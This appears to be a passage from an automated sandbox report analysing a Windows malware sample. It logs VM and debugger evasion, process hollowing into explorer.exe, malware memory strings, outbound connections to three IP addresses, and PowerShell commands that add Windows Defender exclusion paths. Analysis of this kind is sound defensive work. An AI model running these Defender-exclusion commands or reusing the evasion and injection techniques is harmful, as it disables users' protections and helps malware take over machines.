                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5380Thread sleep count: 476 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360Thread sleep count: 6849 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056Thread sleep count: 508 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_00429762 GetSystemInfo,
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266245612.0000000000769000.00000004.00000020.sdmpBinary or memory string: \\.\HGFSl(
                      Source: 9sek3aw7533q9.exe, 00000015.00000002.281169894.0000000000730000.00000004.00000020.sdmpBinary or memory string: \??\HGFS
                      Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: Software\VMware, Inc.
                      Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: Starttooltips_class32%c:\usb20.sys%c:\*pp.exe%c:\%s%c:\pp.exe.lnk%WinDir%\explorer.exe /C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnk{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}VisthAux.exesnxhk.dllSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Classes\originjagexcacheSOFTWARE\Blizzard Entertainment.minecraftLeague of LegendsSoftware\SkypeSoftware\Microsoft\VisualStudioSoftware\VMware, Inc.SOFTWARE\AdwCleanerSOFTWARE\Safer Networking Limited\Spybot - Search & Destroy 2Software\Classes\VirtualStore\MACHINE\SOFTWARE\TrendMicro\HijackThisComboFixLinhaDefensivaHouseCallLanguageSoftware\Valve\SteamMRU0Software\Microsoft\Terminal Server Client\Default%08x:\nortonsymantecsecurityantivirustest_uac_1.exesetup.exerunonce.exe__restartWmiPrvSE.execomctl32.dllGetAddrInfoWGetAddrInfoExWwintrust.dllWinVerifyTrustNtOpenProcessNtCreateFileNtOpenFileNtSetValueKeyNtDeleteValueKeySOFTWARESYSTEM\CurrentControlSet\servicesEnableLUASOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Systemcmd.exe /c start "" "%s" "" DisableSRSOFTWARE\Policies\Microsoft\Windows NT\SystemRestoremrtstub.exe"%s"VersionCheckEnabledSoftware\Microsoft\Windows\CurrentVersion\Policies\ExtEnableJavaUpdateSOFTWARE\JavaSoft\Java Update\PolicySOFTWARE\Wow6432Node\JavaSoft\Java Update\PolicyiCheckReaderSOFTWARE\Adobe\Adobe ARM\1.0\ARMSOFTWARE\Wow6432Node\Adobe\Adobe ARM\1.0\ARMDisableWindowsUpdateAccessSoftware\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdateEnableBalloonTipsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedEnableSmartScreenSOFTWARE\Policies\Microsoft\Windows\SystemSmartScreenEnabledSOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerOff%S\%S\%S\%pgoogle.comwindowsupdate.microsoft.commicrosoft.comupdate.microsoft.comwinmgr108.exemsiexec.exewuauclt.exesvchost.exestratum-ubtcguildpool.itzod.rubitcoinpool.compool0.btcdig.comtriplemining.com.bitparking.commining.eligius.st.bitcoin.czmint.bitminter.compool_addresstcp://-pscryptsha256solid-a http-t @-x socks=wscript.execscript.exevbc.exerundll32.exeregsvr32.exe%ALLUSERSPROFILE%SOFTWARE\Microsoft\CurrentVersion\RunSOFTWARE\Microsoft\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSystemcsrss.exelsass.exesmss.exewinlogon.exeservices.exekernel32.dll.ini.sys%s\%08x.lnk\regsvr32.exe\rundll32.exe\wscript.exe\cscript.exewscript.exe / cscript.exe wscript ~explorer.exedesktop.ini javascript:\mshtml,<script>%08xSOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsLoadWinlogonSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon ,{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}{2faba4c7-4da9-4013-9697-20cc3fd40f85}\CLSID\%S\InprocServer32Wow6432Node\CLSID\%S\InprocServer32Software\Microsoft\Windows\CurrentVersion\Ext\SettingsP: %u // RPE: %u // T: %u // F: %u // MNR: %u // AS: %u // BHO: %u // // vAntiBot() :: Abruptly exited due to update task%s%s_%p%08x%08x%08x%08xSoftware\AppDataLow\Software\%s\%08XSoftware\AppDataLow\Software\%s\%08X\%s.rdatachrome.dllPOSTposthttpHTTP
                      Source: 9sek3aw7533q9.exe, 00000015.00000002.281151249.0000000000723000.00000004.00000020.sdmpBinary or memory string: \??\VBoxGuestq
                      Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: SbieDll.dllapi_log.dlldir_watch.dll%02XEVERYONECURRENT_USER0x%08XSB:0x%08XG:%s_0x%08X_%c:%s_v1$G:%S_0x%08XOPENmscoree.dllSoftware\Microsoft\Internet Explorer\MainSoftware\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u2500IsolationPMILNoProtectedModeBanneryesCheck_AssociationsSOFTWARE\Microsoft\Internet Explorer\MainIEXPLORE.EXESOFTWARE\Clients\StartMenuInternetIE.HTTPProgidSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoiceIE.HTTPSSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoiceIE.AssocFile.HTMchrome.exefirefox.exeopera.exesafari.exe360browser.exemaxthon.exesvcVersionSOFTWARE\Microsoft\Internet ExplorerVersionCurrentVersionSoftware\Mozilla\Mozilla FirefoxHTTP\shell\open\commandStart PageApplications\iexplore.exe\shell\open\commandiex(x86)%s\Internet Explorer\iexplore.exeSoftware\Microsoft\Windows\CurrentVersion\Ext\Settings\%sFlagscookie:Mozilla\Firefox\Profilescookies.sqliteErp~dcen7Zxy~cxe7:7Dnd~ycreyv{d-7```9dnd~ycreyv{d9txzX[[NSUPDxqc`verK^zzby~cn7^ytPZREZxy~cxe~yp7:7VG^7Zxy~cxe7a%7$%:u~cGEXTZXYH@^YSX@HT[VDDC^sv@~ysx`DNDCRZKTxycex{Drc''&Kdrea~trdKS~d|KRybzaz`verauxoDNDCRZKTbeerycTxycex{DrcKdrea~trdKAZ`verDXQC@VERKAZ`ver;7^yt90Libraryindotaskmgr.exeprocexp.exe\DesktopDocuments%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*%s\winsxs\%s\comctl32.dllK32GetMappedFileNameWPsapi.dllGetMappedFileNameWSystemManufacturerHARDWARE\DESCRIPTION\System\BIOSvMwARSystemBiosVersionHARDWARE\DESCRIPTION\SystemvBoXdriversvboxvideo.sysvboxguest.sysvmhgfs.sysprl_boot.sysJJ8J^QPEJJ8J@TynQcsebcmd.exeProcessorNameStringHARDWARE\DESCRIPTION\System\CentralProcessor\0dg_ssudbusApple Mobile DeviceSOFTWARE\Microsoft\Windows NT\CurrentVersion%s\%sdeployment.security.level=MEDIUM
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266268374.0000000000783000.00000004.00000020.sdmpBinary or memory string: \??\VBoxGuests8
                      Source: CpSHySoEfzH.exeBinary or memory string: vmhgfs.sys
                      Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: CpSHySoEfzH.exeBinary or memory string: vboxguest.sys
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266268374.0000000000783000.00000004.00000020.sdmpBinary or memory string: \\.\VBoxGuest
                      Source: 9sek3aw7533q9.exe, 00000015.00000002.281151249.0000000000723000.00000004.00000020.sdmpBinary or memory string: \\.\VBoxGuestK
                      Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266278280.0000000000790000.00000004.00000020.sdmpBinary or memory string: \??\HGFS%3o
                      Source: 9sek3aw7533q9.exe, 00000015.00000002.281122874.0000000000709000.00000004.00000020.sdmpBinary or memory string: \\.\HGFSl]
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266278280.0000000000790000.00000004.00000020.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281169894.0000000000730000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeThread information set: HideFromDebugger
                      Source: C:\Windows\SysWOW64\explorer.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeThread information set: HideFromDebugger
                      Tries to detect sandboxes and other dynamic analysis tools (window names)
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: procmon_window_class
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: tidawindow
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: monitoring - api monitor v2 32-bit
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Process queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Process queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Process queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Process queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Process queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Process queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Process queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Process queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Process queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 2_2_027E2AFC LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 1_2_00468B80 InterlockedIncrement,LoadLibraryA,GetProcAddress,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,WriteFile,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 2_2_004015C6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 2_2_004015C6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 2_2_00401BC1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 2_1_004015C6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 2_1_004015C6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 2_1_00401BC1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 1_2_0042935C GetProcessHeap,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\explorer.exe | Process token adjusted: Debug
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process token adjusted: Debug
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process token adjusted: Debug
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 2_2_004015C6 EntryPoint,SetErrorMode,SetUnhandledExceptionFilter,GetModuleFileNameW,WaitForSingleObjectEx,ExitProcess,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 2_1_004015C6 EntryPoint,SetErrorMode,SetUnhandledExceptionFilter,GetModuleFileNameW,WaitForSingleObjectEx,ExitProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 8.210.47.214 80
                      Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 104.21.55.228 187
                      Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 212.114.52.43 80
                      Adds a directory exclusion to Windows Defender
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Contains functionality to inject code into remote processes
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: 11_2_0043D9E7 GetProcAddress,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,GetProcessHeap,RtlAllocateHeap,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,GetCommandLineA,CreateProcessA,GetProcAddress,GetProcAddress,GetModuleFileNameA,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,_hread,ResumeThread,GetCurrentProcess,VirtualAllocEx,GetProcessHeap,HeapAlloc,GetProcAddress,
                      Injects a PE file into a foreign process
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Memory written: C:\Users\user\Desktop\Documento--SII--33875.exe base: 400000 value starts with: 4D5A
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Memory written: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe base: 400000 value starts with: 4D5A
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Memory written: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe base: 400000 value starts with: 4D5A
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Memory written: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe base: 400000 value starts with: 4D5A
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: unknown protection: execute and read and write
                      Sample uses process hollowing technique
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: E0000
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 47881F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3CA81F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 43081F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3C481F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3C081F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 38781F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3F081F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 40081F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3D081F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 41981F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 45A81F3
